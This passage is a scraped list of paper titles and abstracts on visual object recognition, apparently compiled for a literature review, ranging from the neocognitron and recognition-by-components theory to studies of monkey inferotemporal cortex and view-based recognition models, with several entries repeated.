groupings that are moderately likely at certain places on the object but rare in the background. We show that the statistics in both populations are stable. The candidate regions are those that contain global arrangements of several local groupings. Whereas our model was not conceived to explain brain functions, it does cohere with evidence about the functions of neurons in V1 and V2, such as responses to coarse or incomplete patterns (e.g., illusory contours) and to scale and translation invariance in IT. Finally, the algorithm is applied to face and symbol detection. --- paper_title: Dynamic binding in a neural network for shape recognition. paper_content: Given a single view of an object, humans can readily recognize that object from other views that preserve the parts in the original view. Empirical evidence suggests that this capacity reflects the activation of a viewpoint-invariant structural description specifying the object's parts and the relations among them.
This article presents a neural network that generates such a description. Structural description is made possible through a solution to the dynamic binding problem: Temporary conjunctions of attributes (parts and relations) are represented by synchronized oscillatory activity among independent units representing those attributes. --- paper_title: Recognition-by-components: A theory of human image understanding paper_content: The perceptual recognition of objects is conceptualized to be a process in which the image of the input is segmented at regions of deep concavity into an arrangement of simple geometric components, such as blocks, cylinders, wedges, and cones. The fundamental assumption of the proposed theory, recognition-by-components (RBC), is that a modest set of generalized-cone components, called geons (N ≤ 36), can be derived from contrasts of five readily detectable properties of edges in a two-dimensional image: curvature, collinearity, symmetry, parallelism, and cotermination. The detection of these properties is generally invariant over viewing position and image quality and consequently allows robust object perception when the image is projected from a novel viewpoint or is degraded. RBC thus provides a principled account of the heretofore undecided relation between the classic principles of perceptual organization and pattern recognition: The constraints toward regularization (Prägnanz) characterize not the complete object but the object's components. Representational power derives from an allowance of free combinations of the geons. A Principle of Componential Recovery can account for the major phenomena of object recognition: If an arrangement of two or three geons can be recovered from the input, objects can be quickly recognized even when they are occluded, novel, rotated in depth, or extensively degraded. The results from experiments on the perception of briefly presented pictures by human observers provide empirical support for the theory. Any single object can project an infinity of image configurations to the retina. The orientation of the object to the viewer can vary continuously, each giving rise to a different two-dimensional projection. The object can be occluded by other objects or texture fields, as when viewed behind foliage. The object need not be presented as a full-colored textured image but instead can be a simplified line drawing. Moreover, the object can even be missing some of its parts or be a novel exemplar of its particular category. But it is only with rare exceptions that an image fails to be rapidly and readily classified, either as an instance of a familiar object category or as an instance that cannot be so classified (itself a form of classification). --- paper_title: A Computational Model for Visual Selection paper_content: We propose a computational model for detecting and localizing instances from an object class in static gray-level images. We divide detection into visual selection and final classification, concentrating on the former: drastically reducing the number of candidate regions that require further, usually more intensive, processing, but with a minimum of computation and missed detections. Bottom-up processing is based on local groupings of edge fragments constrained by loose geometrical relationships. They have no a priori semantic or geometric interpretation. The role of training is to select special groupings that are moderately likely at certain places on the object but rare in the background.
We show that the statistics in both populations are stable. The candidate regions are those that contain global arrangements of several local groupings. Whereas our model was not conceived to explain brain functions, it does cohere with evidence about the functions of neurons in V1 and V2, such as responses to coarse or incomplete patterns (e.g., illusory contours) and to scale and translation invariance in IT. Finally, the algorithm is applied to face and symbol detection. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Representation and recognition of the spatial organization of three-dimensional shapes paper_content: The human visual process can be studied by examining the computational problems associated with deriving useful information from retinal images. In this paper, we apply this approach to the problem of representing three-dimensional shapes for the purpose of recognition. 1. Three criteria, accessibility, scope and uniqueness, and stability and sensitivity, are presented for judging the usefulness of a representation for shape recognition. 2. 
Three aspects of a representation's design are considered, (i) the representation's coordinate system, (ii) its primitives, which are the primary units of shape information used in the representation, and (iii) the organization the representation imposes on the information in its descriptions. 3. In terms of these design issues and the criteria presented, a shape representation for recognition should: (i) use an object-centred coordinate system, (ii) include volumetric primitives of varied sizes, and (iii) have a modular organization. A representation based on a shape's natural axes (for example the axes identified by a stick figure) follows directly from these choices. 4. The basic process for deriving a shape description in this representation must involve: (i) a means for identifying the natural axes of a shape in its image and (ii) a mechanism for transforming viewer-centred axis specifications to specifications in an object-centred coordinate system. 5. Shape recognition involves: (i) a collection of stored shape descriptions, and (ii) various indexes into the collection that allow a newly derived description to be associated with an appropriate stored description. The most important of these indexes allows shape recognition to proceed conservatively from the general to the specific based on the specificity of the information available from the image. 6. New constraints supplied by a conservative recognition process can be used to extract more information from the image. A relaxation process for carrying out this constraint analysis is described. --- paper_title: Dynamic Model of Visual Recognition Predicts Neural Response Properties in the Visual Cortex paper_content: Recent neurophysiological experiments appear to indicate that the responses of visual cortical neurons in a monkey freely viewing a natural scene can sometimes differ substantially from those obtained when the same image subregions are flashed during a conventional fixation task. These new findings attain significance from the fact that neurophysiological research in the past has been based predominantly on cell recordings obtained during fixation tasks, under the assumption that these data would be useful in predicting responses in more general situations. We describe a hierarchical model of visual memory that reconciles the two differing experimental results mentioned above by predicting neural responses in both fixating and free-viewing conditions. The model dynamically combines input-driven bottom-up signals with expectation-driven top-down signals to achieve optimal estimation of current state using a Kalman filter based framework. The architecture of the model posits a role for the reciprocal connections between adjoining visual cortical areas in determining neural response properties. --- paper_title: Neocognitron: A self-organizing neural network model for a mechanism of pattern recognition unaffected by shift in position paper_content: A neural network model for a mechanism of visual pattern recognition is proposed in this paper. The network is self-organized by “learning without a teacher”, and acquires an ability to recognize stimulus patterns based on the geometrical similarity (Gestalt) of their shapes without affected by their positions. This network is given a nickname “neocognitron”. After completion of self-organization, the network has a structure similar to the hierarchy model of the visual nervous system proposed by Hubel and Wiesel. 
The network consists of an input layer (photoreceptor array) followed by a cascade connection of a number of modular structures, each of which is composed of two layers of cells connected in a cascade. The first layer of each module consists of “S-cells”, which show characteristics similar to simple cells or lower order hypercomplex cells, and the second layer consists of “C-cells” similar to complex cells or higher order hypercomplex cells. The afferent synapses to each S-cell have plasticity and are modifiable. The network has an ability of unsupervised learning: We do not need any “teacher” during the process of self-organization, and it is only needed to present a set of stimulus patterns repeatedly to the input layer of the network. The network has been simulated on a digital computer. After repetitive presentation of a set of stimulus patterns, each stimulus pattern has become to elicit an output only from one of the C-cell of the last layer, and conversely, this C-cell has become selectively responsive only to that stimulus pattern. That is, none of the C-cells of the last layer responds to more than one stimulus pattern. The response of the C-cells of the last layer is not affected by the pattern's position at all. Neither is it affected by a small change in shape nor in size of the stimulus pattern. --- paper_title: Properties of Simulated Neurons from a Model of Primate Inferior Temporal Cortex paper_content: The physiological properties of neurons in inferior temporal (IT) cortex of the macaque monkey suggest that this cortical area plays a major role in visual pattern recognition. Based on the properties of IT, and one of its major sources of input, V4, a model is proposed that can account for some of the shape recognition properties of IT neurons including selectivity for complex visual stimuli and tolerance to the size and location of the stimuli. The model is composed of three components. First, stimulus location tolerance is modeled after the complex-cell-like properties observed in some V4 neurons. The second component of the model is an attentionally controlled scaling mechanism that facilitates size-invariant shape recognition. The transition from edge orientation-selective neurons in V4 to neurons with more complicated stimulus preference in IT is explained by the third component of the model, a competitive learning mechanism. Single-unit analysis of receptive field properties, stimulus selectivity, and stimulus size and position tolerance was performed on "neurons" from the simulation. Comparison of results from the simulation and a study of actual IT neurons shows that the set of mechanisms incorporated into the simulation is sufficient to emulate the physiological data. --- paper_title: SEEMORE: Combining Color, Shape, and Texture Histogramming in a Neurally Inspired Approach to Visual Object Recognition paper_content: Severe architectural and timing constraints within the primate visual system support the conjecture that the early phase of object recognition in the brain is based on a feedforward feature-extraction hierarchy. To assess the plausibility of this conjecture in an engineering context, a difficult three-dimensional object recognition domain was developed to challenge a pure feedforward, receptive-field based recognition model called SEEMORE. SEEMORE is based on 102 viewpoint-invariant nonlinear filters that as a group are sensitive to contour, texture, and color cues. 
The visual domain consists of 100 real objects of many different types, including rigid (shovel), nonrigid (telephone cord), and statistical (maple leaf cluster) objects and photographs of complex scenes. Objects were individually presented in color video images under normal room lighting conditions. Based on 12 to 36 training views, SEEMORE was required to recognize unnormalized test views of objects that could vary in position, orientation ... --- paper_title: News On Views: Pandemonium Revisited paper_content: How do we recognize objects from different viewpoints? A new model, based on the known properties of cortical neurons, may help resolve this long-standing debate. --- paper_title: A Neurobiological Model of Visual Attention and Invariant Pattern Recognition Based on Dynamic Routing of Information paper_content: We present a biologically plausible model of an attentional mechanism for forming position- and scale-invariant representations of objects in the visual world. The model relies on a set of control neurons to dynamically modify the synaptic strengths of intracortical connections so that information from a windowed region of primary visual cortex (V1) is selectively routed to higher cortical areas. Local spatial relationships (i.e., topography) within the attentional window are preserved as information is routed through the cortex. This enables attended objects to be represented in higher cortical areas within an object-centered reference frame that is position and scale invariant. We hypothesize that the pulvinar may provide the control signals for routing information through the cortex. The dynamics of the control neurons are governed by simple differential equations that could be realized by neurobiologically plausible circuits. In preattentive mode, the control neurons receive their input from a low-level “saliency map” representing potentially interesting regions of a scene. During the pattern recognition phase, control neurons are driven by the interaction between top-down (memory) and bottom-up (retinal input) sources. The model respects key neurophysiological, neuroanatomical, and psychophysical data relating to attention, and it makes a variety of experimentally testable predictions. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g. colinear terminating lines) are resolved in prestriate visual cortex, (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. 
This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: Shifter circuits: a computational strategy for dynamic aspects of visual processing paper_content: We propose a general strategy for dynamic control of information flow between arrays of neurons at different levels of the visual pathway, starting in the lateral geniculate nucleus and the geniculorecipient layers of cortical area V1. This strategy can be used for resolving computational problems arising in the domains of stereopsis, directed visual attention, and the perception of moving images. In each of these situations, some means of dynamically controlling how retinal outputs map onto higher-level targets is desirable--in order to achieve binocular fusion, to allow shifts of the focus of attention, and to prevent blurring of moving images. The proposed solution involves what we term "shifter circuits," which allow for dynamic shifts in the relative alignment of input and output arrays without loss of local spatial relationships. The shifts are produced in increments along a succession of relay stages that are linked by diverging excitatory inputs. The direction of shift is controlled at each stage by inhibitory neurons that selectively suppress appropriate sets of ascending inputs. The shifter hypothesis is consistent with available anatomical and physiological evidence on the organization of the primate visual pathway, and it offers a sensible explanation for a variety of otherwise puzzling facts, such as the plethora of cells in the geniculorecipient layers of V1. --- paper_title: Visual properties of neurons in a polysensory area in superior temporal sulcus of the macaque. paper_content: 1. We recorded from single neurons in the dorsal bank and fundus of the anterior portion of the superior temporal sulcus, an area we term the superior temporal polysensory area (STP). Five macaques were studied under anesthesia (N2O) and immobilization in repeated recording sessions. 2. Almost all of the neurons were visually responsive, and over half responded to more than one sensory modality; 21% responded to visual and auditory stimuli, 17% responded to visual and somesthetic stimuli, 17% were trimodal, and 41% were exclusively visual. 3. Almost all the visual receptive fields extended into both visual half-fields, and the majority approached the size of the visual field of the monkey, including both monocular crescents. Somesthetic receptive fields were also bilateral and usually included most of the body surface. 4. Virtually all neurons responded better to moving visual stimuli than to stationary visual stimuli, and almost half were sensitive to the direction of movement. Several classes of directional neurons were found, including a) neurons selective for a single direction of movement throughout their receptive field, b) neurons selective for directions of movement radially symmetric about the center of gaze, and c) neurons selective for movement in depth. 5. The majority of neurons (70%) had little or no preference for stimulus size, shape, orientation, or contrast. The minority (30%) responded best to particular stimuli. Some of these appeared to be selective for faces. 6. 
The properties of most STP neurons, such as large receptive fields, sensitivity to movement, insensitivity to form, and polymodal responsiveness, suggest that STP is more involved in orientation and spatial functions than in pattern recognition. --- paper_title: Rotating objects to recognize them: A case study on the role of viewpoint dependency in the recognition of three-dimensional objects. paper_content: Successful object recognition is essential for finding food, identifying kin, and avoiding danger, as well as many other adaptive behaviors. To accomplish this feat, the visual system must reconstruct 3-D interpretations from 2-D “snapshots” falling on the retina. Theories of recognition address this process by focusing on the question of how object representations are encoded with respect to viewpoint. Although empirical evidence has been equivocal on this question, a growing body of surprising results, including those obtained in the experiments presented in this case study, indicates that recognition is often viewpoint dependent. Such findings reveal a prominent role for viewpoint-dependent mechanisms and provide support for the multiple-views approach, in which objects are encoded as a set of view-specific representations that are matched to percepts using normalization procedures. --- paper_title: Activity of neurones in the inferotemporal cortex of the alert monkey paper_content: The activity of neurones in the inferotemporal cortex of the alert rhesus monkey was recorded while the monkey was shown visual stimuli, which included both food and non-food objects for comparison with the activity of neurones in the lateral hypothalamus and substantia innominata. In the anteroventral part of the inferotemporal cortex, neurones were found with visual responses which were sustained while the animal looked at the appropriate visual stimuli. The latency of the responses was 100 msec or more. The majority (96/142 or 68%) of these neurones responded more strongly to some stimuli than to others. These units usually had different responses when objects were shown from different views, and physical factors such as shape, size, orientation, colour and texture appeared to account for the responses of some of these units. Association of visual stimuli with a food reward (glucose solution) or an aversive taste (5% saline solution) did not affect the magnitude of the responses of the neurones to the stimuli either during the learning or after the period of learning. Nor did feeding the monkey to satiety affect the responses of the neurones to their effective stimuli. --- paper_title: Inferotemporal Cortex and Object Vision paper_content: Cells in area TE of the inferotemporal cortex of the monkey brain selectively respond to various moderately complex object features, and those that cluster in a columnar region that runs perpendicular to the cortical surface respond to similar features. Although cells within a column respond to similar features, their selectivity is not necessarily identical. The data of optical imaging in TE have suggested that the borders between neighboring columns are not discrete; a continuous mapping of complex feature space within a larger region contains several partially overlapped columns. This continuous mapping may be used for various computations, such as production of the image of the object at different viewing angles, illumination conditions, and articulation poses. 
--- paper_title: Face-Selective Cells in the Temporal Cortex of Monkeys paper_content: The notion of a neuron that responds selectively to the image of a particular complex object has been controversial ever since Gross and his colleagues reported neurons in the temporal cortex of monkeys that were selective for the sight of a monkey's hand (Gross, Rocha-Miranda, & Bender, 1972). Since that time, evidence has mounted for neurons in the temporal lobe that respond selectively to faces. The present paper presents a critical analysis of the evidence for face neurons and discusses the implications of these neurons for models of object recognition. The paper also presents some possible reasons for the evolution of face neurons and suggests some analogies with the development of language in humans. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Visual Object Recognition paper_content: Technical solutions are described for training an object-recognition neural network that identifies an object in a computer-readable image. An example method includes assigning a first neural network for determining a visual alignment model of the images for determining a normalized alignment of the object. The method further includes assigning a second neural network for determining a visual representation model of the images for recognizing the object. The method further includes determining the visual alignment model by training the first neural network and determining the visual representation model by training the second neural network independent of the first. The method further includes determining a combined object recognition model by training a combination of the first neural network and the second neural network. The method further includes recognizing the object in the image based on the combined object recognition model by passing the image through each of the neural networks. --- paper_title: Shape representation in the inferior temporal cortex of monkeys paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. 
Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Inferotemporal units in selective visual attention and short-term memory paper_content: 1. This research was designed to further clarify how, in the primate, the neurons of the inferotemporal (IT) cortex support the cognitive functions of visually guided behavior. Specifically, the aim was to determine the role of those neurons in 1) selective attention to behaviorally relevant features of the visual environment and 2) retention of those features in temporary memory. Monkeys were trained in a memory task in which they had to discriminate and retain individual features of compound stimuli, each stimulus consisting of a colored disk with a gray symbol in the middle. A trial began with brief presentation of one such stimulus, the sample for the trial. 
Depending on the symbol in it, the monkey had to memorize the symbol itself or the background color; after 10-20 s of delay (retention period), two compound stimuli appeared, and the animal had to choose the one with the symbol or with the color of the sample. Thus the test required attention to the symbol, in some trials also to the color, and short-term retention of the distinctive feature for each trial, either a symbol or a color. Single-unit activity was recorded from cortex of the IT convexity, lower and upper banks of the superior temporal sulcus (STS), and from striate cortex (V1). Firing frequency was analyzed during intertrial periods and during the entirety of every trial, except for the (match) choice period. 2. In IT cortex, as in V1, many units responded to the sample stimulus. Some responded indiscriminately to all samples, whereas others responded selectively to one of their features, i.e., to one symbol or to one color. Fifteen percent of the IT units were symbol selective and 21% color selective. These neurons appeared capable of extracting individual features from complex stimuli. Some color cells (color-attentive units) responded significantly more to their preferred color when it was relevant (i.e., had to be retained) than when it was not. 3. The latency of IT-unit response to the sample stimulus was, on the average, relatively short in unselective units (mean 159 ms), longer in symbol units (mean 203 ms), and longest in color-attentive units (mean 270 ms). This order of latencies corresponds to the presumed order of participation of those three types of units in the selective attention to the component features of the sample as required by the task. It suggests intervening steps of serial processing before color information reached color-attentive cells.(ABSTRACT TRUNCATED AT 400 WORDS) --- paper_title: Image-based object recognition in man, monkey and machine paper_content: Theories of visual object recognition must solve the problem of recognizing 3D objects given that perceivers only receive 2D patterns of light on their retinae. Recent findings from human psychophysics, neurophysiology and machine vision provide converging evidence for ‘image-based’ models in which objects are represented as collections of viewpoint-specific local features. This approach is contrasted with ‘structural-description’ models in which objects are represented as configurations of 3D volumes or parts. We then review recent behavioral results that address the biological plausibility of both approaches, as well as some of their computational advantages and limitations. We conclude that, although the image-based approach holds great promise, it has potential pitfalls that may be best overcome by including structural information. Thus, the most viable model of object recognition may be one that incorporates the most appealing aspects of both image-based and structural-description theories.  1998 Elsevier Science B.V. All rights reserved --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. 
The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Neocognitron: A self-organizing neural network model for a mechanism of pattern recognition unaffected by shift in position paper_content: A neural network model for a mechanism of visual pattern recognition is proposed in this paper. The network is self-organized by “learning without a teacher”, and acquires an ability to recognize stimulus patterns based on the geometrical similarity (Gestalt) of their shapes without affected by their positions. This network is given a nickname “neocognitron”. After completion of self-organization, the network has a structure similar to the hierarchy model of the visual nervous system proposed by Hubel and Wiesel. The network consits of an input layer (photoreceptor array) followed by a cascade connection of a number of modular structures, each of which is composed of two layers of cells connected in a cascade. The first layer of each module consists of “S-cells”, which show characteristics similar to simple cells or lower order hypercomplex cells, and the second layer consists of “C-cells” similar to complex cells or higher order hypercomplex cells. The afferent synapses to each S-cell have plasticity and are modifiable. The network has an ability of unsupervised learning: We do not need any “teacher” during the process of self-organization, and it is only needed to present a set of stimulus patterns repeatedly to the input layer of the network. The network has been simulated on a digital computer. After repetitive presentation of a set of stimulus patterns, each stimulus pattern has become to elicit an output only from one of the C-cell of the last layer, and conversely, this C-cell has become selectively responsive only to that stimulus pattern. That is, none of the C-cells of the last layer responds to more than one stimulus pattern. The response of the C-cells of the last layer is not affected by the pattern's position at all. Neither is it affected by a small change in shape nor in size of the stimulus pattern. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. 
paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g. colinear terminating lines) are resolved in prestriate visual cortex, (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: Shape representation in the inferior temporal cortex of monkeys paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? 
Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Linear Object Classes and Image Synthesis From a Single Example Image paper_content: The need to generate new views of a 3D object from a single real image arises in several fields, including graphics and object recognition. While the traditional approach relies on the use of 3D models, simpler techniques are applicable under restricted conditions. The approach exploits image transformations that are specific to the relevant object class, and learnable from example views of other "prototypical" objects of the same class. In this paper, we introduce such a technique by extending the notion of linear class proposed by the authors (1992). For linear object classes, it is shown that linear transformations can be learned exactly from a basis set of 2D prototypical views. We demonstrate the approach on artificial objects and then show preliminary evidence that the technique can effectively "rotate" high-resolution face images from a single 2D view. --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. 
The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Becoming a “Greeble” Expert: Exploring Mechanisms for Face Recognition paper_content: Sensitivity to configural changes in face processing has been cited as evidence for face-exclusive mechanisms. Alternatively, general mechanisms could be fine-tuned by experience with homogeneous stimuli. We tested sensitivity to configural transformations for novices and experts with nonface stimuli (“Greebles”). Parts of transformed Greebles were identified via forced-choice recognition. Regardless of expertise level, the recognition of parts in the Studied configuration was better than in isolation, suggesting an object advantage. For experts, recognizing Greeble parts in a Transformed configuration was slower than in the Studied configuration, but only at upright. Thus, expertise with visually similar objects, not faces per se, may produce configural sensitivity. © 1997 Elsevier Science Ltd. --- paper_title: Class similarity and viewpoint invariance in the recognition of 3D objects paper_content: In human vision, the processes and the representations involved in identifying specific individuals are frequently assumed to be different from those used for basic level classification, because classification is largely viewpoint-invariant, but identification is not. This assumption was tested in psychophysical experiments, in which objective similarity between stimuli (and, consequently, the level of their distinction) varied in a controlled fashion. Subjects were trained to discriminate between two classes of computer-generated three-dimensional objects, one resembling monkeys and the other, dogs. Both classes were defined by the same set of 56 parameters, which encoded sizes, shapes, and placement of the limbs, ears, snout, etc. Interpolation between parameter vectors of the class prototypes yielded shapes that changed smoothly between monkey and dog. Within-class variation was induced in each trial by randomly perturbing all the parameters. 
